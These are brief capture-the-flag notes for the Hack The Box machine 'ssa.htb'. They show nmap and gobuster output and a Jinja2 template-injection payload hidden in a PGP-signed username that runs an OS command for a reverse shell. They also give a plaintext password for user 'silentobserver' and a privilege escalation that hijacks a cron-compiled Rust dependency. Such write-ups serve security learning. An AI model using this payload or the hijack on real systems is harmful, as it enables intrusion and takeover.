> nmap ssa.htb

	Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-28 11:59 CEST
	Nmap scan report for ssa.htb (10.10.11.218)
	Host is up (0.22s latency).
	Not shown: 997 closed tcp ports (conn-refused)
	PORT    STATE SERVICE
	22/tcp  open  ssh
	80/tcp  open  http
	443/tcp open  https

	Nmap done: 1 IP address (1 host up) scanned in 28.66 seconds

> gobuster dir -u https://ssa.htb/ -t 100 -w /usr/share/wordlists/dirb/big.txt -k

	===============================================================
	Gobuster v3.6
	by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
	===============================================================
	[+] Url:                     https://ssa.htb/
	[+] Method:                  GET
	[+] Threads:                 100
	[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
	[+] Negative Status codes:   404
	[+] User Agent:              gobuster/3.6
	[+] Timeout:                 10s
	===============================================================
	Starting gobuster in directory enumeration mode
	===============================================================
	/about                (Status: 200) [Size: 5584]
	/admin                (Status: 302) [Size: 227] [--> /login?next=%2Fadmin]
	/contact              (Status: 200) [Size: 3543]
	/guide                (Status: 200) [Size: 9043]
	/login                (Status: 200) [Size: 4392]
	/logout               (Status: 302) [Size: 229] [--> /login?next=%2Flogout]
	/pgp                  (Status: 200) [Size: 3187]
	/process              (Status: 405) [Size: 153]
	/view                 (Status: 302) [Size: 225] [--> /login?next=%2Fview]
	Progress: 20469 / 20470 (100.00%)
	===============================================================
	Finished
	===============================================================

> used verify signature in guide page with gpg
> template injection using user name in pgp clear-signed text
> reverse shell with username :
	{{ self.__init__.__globals__.__builtins__.__import__('os').popen('GENERATED WITH rev_sh_enc') }}
> credentials for silentobserver in /home/atlas/.config/httpie/sessions/localhost_5000

    "auth": {
        "password": "quietLiketheWind22",
        "type": null,
        "username": "silentobserver"
    },

> connect through ssh
> use pspy to spot a cron job starting tipnet and compiling some rust crates
> find a writable dependency in /opt/tipnet/target/debug/tipnet.d
> use full_atlas.sh to overwrite it and get a full reverse shell to atlas

> configure ssh connection with id_rsa.pub
